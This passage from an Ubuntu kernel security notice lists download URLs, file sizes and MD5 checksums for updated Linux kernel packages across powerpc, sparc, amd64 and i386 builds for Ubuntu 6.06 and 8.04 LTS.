http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:  1925072 2c1fefed78a6ebc795887a2f27c9db4e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:  2449126 39606af1d24872f0ff053ef5ddf790bd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-powerpc-smp_2.6.15-55.82_powerpc.deb\n      Size/MD5:   872990 d1ced46d4302cb78b2d47c5ea678d6bc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-powerpc64-smp_2.6.15-55.82_powerpc.deb\n      Size/MD5:   872596 8602056ab95806f02667587737cb3b59\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-powerpc_2.6.15-55.82_powerpc.deb\n      Size/MD5:   865624 336f5e63d1fc8a9f55e7e36f4177f54a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.82_powerpc.deb\n      Size/MD5:  6947694 9ab99966a30e44788549998ae0e26798\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-powerpc-smp_2.6.15-55.82_powerpc.deb\n      Size/MD5: 22783922 2c7ace12a48de978cea2e7e939c3c900\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-powerpc64-smp_2.6.15-55.82_powerpc.deb\n      Size/MD5: 23693062 18b76996711d54f91edd68a52b45d666\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-powerpc_2.6.15-55.82_powerpc.deb\n      Size/MD5: 22365356 f8a73866c9b4334ace774f26ddaa0e38\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    17782 6a4cc5fc57579f3f602f582acb1231fb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    17386 1abc2376b554610aec23e87f60998358\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   261350 a2a6eff082f29827c9505b45dee47f7d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   282620 93ef7729a3cc9f4639e9d34c8782d8c5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   227808 73c5142c206284bb244b59586a93d8b6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   248952 d0c1d09bb0b125ae113a70baa7a06cc0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:  1048470 66d28a86b670f1166faeb1c25a1547ad\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:  1048600 178ea75b2bd02ef3b01c4cf940b6a713\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:  1738490 8fdc1918d06d76e358e7645e24d763b5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:  1878020 0b6e4cc3971bb034e26a3aee110cbc58\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   250814 c48a5e0837fa30e3b1480c113c02d963\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   233524 676bf7f8905001fea721689f23ae5f6e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    13054 73a21ffbe4470fe4108886ee20990c35\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    13528 1105da0ce6deb9d13a19e8b6398827db\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    84794 ccbc384bd76aacf39ac078437d709d51\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    52204 acd012d94fac6fd62028de4920ff5a67\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    73922 a2d1c6a539934c1a852cf0b2c56ada43\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    85854 59c8914383ae0624690950d8f844c101\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:     6624 b926e6807098f087b5eab77015ef1aee\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:     7058 43cb29678a86a4ace2a784ef2c2e8843\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    60378 183583ac6a0ab738109499861a861ca2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    70420 da9263ada0b850362f022c36b6769f22\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   128550 5eaff599374f099cbb06bb709f1ce68c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   157944 8ef2e5efb4749e8e1725c58a185871bd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   108166 1a09b1fb98eb414ba847dc8634a28a62\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   126130 e2ae3a3d5d06c8e6a5394c2262381438\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    87294 610a552fd6a9c960f64c8ed4a74c5b39\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    93362 a7434712a48c99eba3cfd1dcdf4db489\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:  2014708 a089ebb3c11c6fd25f65c069adc4f1cb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:  1988690 049558cbf765292686c49fc8e180ca0f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   104130 cfa3ef8f4085a002160c319cdc9899ed\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   115790 ac0661102201e3f682eda1052d987671\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    12738 f683a291e68f38a5c2785aed5452f77c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    14444 24e22f4de6be23c1fe122e8c3dbdfdc0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    39950 b8aa9421b4aaf324bc7349b026e3c30e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    41540 c174de599d57427fbbe0544bdea28cf0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   149344 f742184c85574c83ec84aa70cb9cdfea\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   168082 6f375034031b861fe42ba973c9390ded\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    42310 e24ddfc7d97416cdca5325a9ce197781\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    44918 de0152b64cf3da754a73ba952625e15b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   320326 87594e9f43ab0dff57a8ae731be77dfa\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   324872 a53f9d6f2e8118894b3c5ee8a98b7441\n\n  sparc architecture (Sun SPARC/UltraSPARC):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:    50476 aea13d5d96a87d5b3a0cb897605f8226\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:     2358 b0af3cd8de1581e95acdba1dd91796e9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:    40380 c083f0781fb33b64329d10c233affde2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:   110556 cea10ae3446945f5dcc6b94a8050b4ad\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:    41214 b0728ed58d1e1a5bcc4309849d773e91\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:   104224 54844dc4f0225e051453b6a01934edb3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:     7438 7cfdeca11c465cea2c2e8d768b39969e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:   149304 958f0b630326763cddddce5503f3319d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:  1712530 f967805acb454413bbcc2f377f5b3e36\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-sparc64-smp_2.6.15-55.82_sparc.deb\n      Size/MD5:   773010 979da22c264d122841ea140319b365ce\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-sparc64_2.6.15-55.82_sparc.deb\n      Size/MD5:   772604 3106b0711e0e311f93d92624247f1eea\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.82_sparc.deb\n      Size/MD5:  6964184 fb615cef69d2a79b16cfda4b67bf4e50\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-sparc64-smp_2.6.15-55.82_sparc.deb\n      Size/MD5: 15017856 479231852577fdd0e402556287a02059\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-sparc64_2.6.15-55.82_sparc.deb\n      Size/MD5: 14831912 1bd18f6f1ccc6b70379e267a0173b9bb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:     7436 87e52fb1ba93a9e9763a0f3984bc15a5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:   248758 bc3db8ee9c85b0aaf1ec03290ae41cf3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:   212566 70a9e482f9be5074d90bbd4ae5cf1246\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:  1048480 c535170499441feef6ef8b3062de2d30\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:  1482394 247faeb24ed7d02526dc54dfb194dec4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:    10118 28a82b2b4d4934c028952b17676d515a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:    40178 d44c9cb160749b87062ff38c0fc11340\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:     9370 c7d50aabcba6ff111825da92f10dd219\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:    61398 df892cd2f9e118248246eb7d3c273df4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:   163276 481deef18ee50e039791747737619c3e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:    64096 9ebc582fc849cdcf71ee887937313a22\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:  1235396 479e0c0baad9c8cf96fe44603c2fb9b9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:    59308 83efde441d0de3f09bb163e53016a300\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:    37430 3646c295a3bbadafbe6df1fb22d8391e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:   280132 311d2d465db827f3e3f2e95bc265ddb6\n\nUpdated packages for Ubuntu 8.04 LTS:\n\n  Source archives:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24-27.65.diff.gz\n      Size/MD5:  4747158 57102623f2993049cb4d309f75748b5f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24-27.65.dsc\n      Size/MD5:     2689 3d66528dd1a11628dd0e2ec5fadfa2b0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24.orig.tar.gz\n      Size/MD5: 59085601 e4aad2f8c445505cbbfa92864f5941ab\n\n  Architecture independent packages:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.24_2.6.24-27.65_all.deb\n      Size/MD5:  4930936 41797a4c4537dc9e4abb06f5b811a6f4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27_2.6.24-27.65_all.deb\n      Size/MD5:  8146690 ea0f32ddeaa300bc68f90838a6466257\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-kernel-devel_2.6.24-27.65_all.deb\n      Size/MD5:    99216 bec450b038c03760a6f369323af1a0d5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.24_2.6.24-27.65_all.deb\n      Size/MD5: 46970850 cadaea7041848682d5e46a181aa43fb4\n\n  amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    28614 de37ceb847d7f811723dee03e7fc9ab9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:   224184 6b392a2ef779b2048c78f46c1e833e2f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    52646 2c736bab70f1efeade320f9062b74729\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    40644 a6209cbd666c38e1c4bc75115fda79f5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    48646 6affd584126a9ecd4d3560dfa69a201f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    86332 097b613836ca5101cd37cabfe7299adc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    36316 f3915273cbd0e4a218a543ac525d7674\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:   648728 9021fcdfc468efb5a2994dab918aad7a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:   209928 967a98f6cfa9c56dcecbe0872e98b617\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    39194 5ad172f156b5e2ba43fee3a69a09fb49\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    67996 9ca474a40f4225116d7d9befcde4dbb5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:   145458 3e087634d61556643c32e342214a0642\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:   287262 202933f0bb0a3d09ae278a991139eaf1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:  2130554 f0a40b4f0002803063b074d4b2b22775\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-generic_2.6.24-27.65_amd64.deb\n      Size/MD5:   673974 3ee01bd889b29b761f96eab35f839815\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-openvz_2.6.24-27.65_amd64.deb\n      Size/MD5:  1252948 e0734c904a26acf9daadc8dc13a5331c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-rt_2.6.24-27.65_amd64.deb\n      Size/MD5:  1274832 4784ef460e510677dd0c62ba0e5d75a3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-server_2.6.24-27.65_amd64.deb\n      Size/MD5:   674092 b2b2090661ff113ec00e1b08627238c3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-xen_2.6.24-27.65_amd64.deb\n      Size/MD5:  1084370 ef5cd734b586855f7b94d5b93bb51c42\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-generic_2.6.24-27.65_amd64.deb\n      Size/MD5: 17809172 46d4f01f3cb62fc8c006c25d291bdbde\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-server_2.6.24-27.65_amd64.deb\n      Size/MD5: 17781410 589743282c76d9ae95751cefae7dcd1f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-generic_2.6.24-27.65_amd64.deb\n      Size/MD5: 21055946 71c5ed78b283260aa76abe43a5199869\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-server_2.6.24-27.65_amd64.deb\n      Size/MD5: 21440010 76e220b0a64e1b1fb76a54aaa5cde808\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_amd64.deb\n      Size/MD5:   707586 4d51f71c8ac5227c9f02fbc0c6552453\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:   263678 73ef23d338fe298802ae13ea52af05a1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:   176420 0709db4bda579f5146063e7bedeef8cf\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:   254102 7b20912de5e61b0206319019c4800ef1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:  1641364 98d7399720bae5a9d3e1637cc6f13ce9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:   143718 419053c97211aea3dd9b2aa0833bc6bc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:   164466 16e2d4ad08a10d9e9d2b33dbee4c08ba\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:   115858 74f2c34acf328f485356f38e86eb6aa2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    35056 5307b10f96b76f43c0bf983007f36021\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    64412 7cf4750ba6f0dd63678eae705da55fbf\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    69706 dedcbc58256ac2a43ed625eb7cae6e81\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    21598 6d6c27b8756a70466451449e096bd149\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:     8622 4414757aa7034cafa1e98d8bacf080f9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    57232 8690d6c34e1ec87d85b2c20cb280acb9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:   103044 73c875b66060da7f1d39f2a5f8eecf36\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:  1212518 6e237c8e863f3cea5cc702afbd925b77\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    45500 1883d8bdf4ed7b2aebc1a407502bd556\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    12780 fa12802bfa4f6847c5409d4882e9aa9a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:   498032 d5e81ea5e16357ae1be8c0ac77685256\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    75048 24c6c2fa1972611542270d68ccae59a6\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-openvz_2.6.24-27.65_amd64.deb\n      Size/MD5: 19256730 d7f5e8ae9464748ac2a6dbc46ed9f1c1\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-rt_2.6.24-27.65_amd64.deb\n      Size/MD5: 17909990 e4e3916570b7b5f06645d2623111b0ef\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-xen_2.6.24-27.65_amd64.deb\n      Size/MD5: 18911564 fd71e9397f8919af683848aa456c885f\n\n  i386 architecture (x86 compatible Intel/AMD):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    23690 ceb5d148f00965516252470b41d00b56\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    26794 50bb7020338de7d00265de0765578291\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   218818 a3b52dd67e9817d4e60d8b048f542717\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      